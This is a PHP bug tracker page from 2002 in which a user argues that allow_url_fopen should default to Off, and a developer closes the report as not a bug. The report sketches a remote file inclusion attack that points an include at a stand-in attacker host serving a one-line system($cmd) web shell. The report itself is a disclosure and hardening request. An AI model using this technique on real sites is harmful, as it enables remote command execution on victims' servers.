PHP :: Bug #21085 :: allow_url_fopen is on be default.

Bug #21085	allow_url_fopen is on be default.
Submitted:	2002-12-18 15:34 UTC	Modified:	2002-12-18 19:51 UTC
From:	szii at sziisoft dot com	Assigned:
Status:	Not a bug	Package:	Unknown/Other Function
PHP Version:	4.3.0RC3	OS:	ALL
Private report:	No	CVE-ID:	None

View Add Comment Developer Edit

Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.

php.net Username: php.net Password:

Quick Fix:	(description)
	Block user comment
Status:		Assign to:
Package:
Bug Type:
Summary:
From:	szii at sziisoft dot com
New email:
PHP Version:		OS:

New/Additional Comment:

[2002-12-18 15:34 UTC] szii at sziisoft dot com

PHP by default allows include() calls which contain URL/URI strings.

register_globals=on
include($somevar/file.php); // real site code

exploit by overriding $somevar to http://badsite.evilcode.com 

where file.php is

<?php system($cmd); ?>

This causes the "real site" to execute the $cmd command passed in on the URL/URI string.

Requesting that allow_url_fopen be set to "Off" for future releases and a documentation note made about the caveat.

-Mike

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports

[2002-12-18 15:41 UTC] derick@php.net

It's really up to the user to validate input from the outside. You can always shoot yourself in the foot if you want to. There is no valid reason to change this default.

[2002-12-18 19:51 UTC] szii at sziisoft dot com

Agreed. However we live in a world where people aren't reading every single piece of every single package they install.  Sure, anyone can shoot themselves in the foot.
Sure, you can code poorly.  But should this particular "feature" be on by default instead of turned on?  If they turn it on, they know what they're doing.  If they just drop the packages in...well, why make it easy to exploit?  (Case in point - friend of mine who's not a total newbie got hacked this way.) IMHO, the default package should be as "dummy proof" as possible and able to be opened up from there.  However, it's not up to me..

-Mike

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Tue May 07 11:01:31 2024 UTC